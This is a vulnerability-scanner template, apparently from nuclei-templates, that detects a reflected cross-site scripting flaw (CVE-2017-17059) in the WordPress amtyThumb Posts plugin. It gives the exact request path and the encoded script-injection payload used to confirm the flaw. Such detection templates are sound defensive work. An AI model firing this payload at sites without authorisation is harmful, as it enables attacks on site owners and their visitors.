nuclei-templates/http/cves/2017/CVE-2017-17059.yaml

69 lines
2.2 KiB
YAML

id: CVE-2017-17059
info:
name: WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser.
remediation: |
Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor.
reference:
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
- https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-17059
cwe-id: CWE-79
epss-score: 0.00261
epss-percentile: 0.63794
cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: amtythumb_project
product: amtythumb
framework: wordpress
tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Amty Thumb'
- 'Tags:'
condition: and
case-insensitive: true
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"
body: "amty_hidden=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022074f0b24a9cb480e81960e319cc7ee19b77dec9226fe67fb84ef549e875531ccb022100d2da121efbde5f1678796a09a5a402923ee1a4b01df208e0d978251d20b71f1b:922c64590222798bb761d5b6d8e72950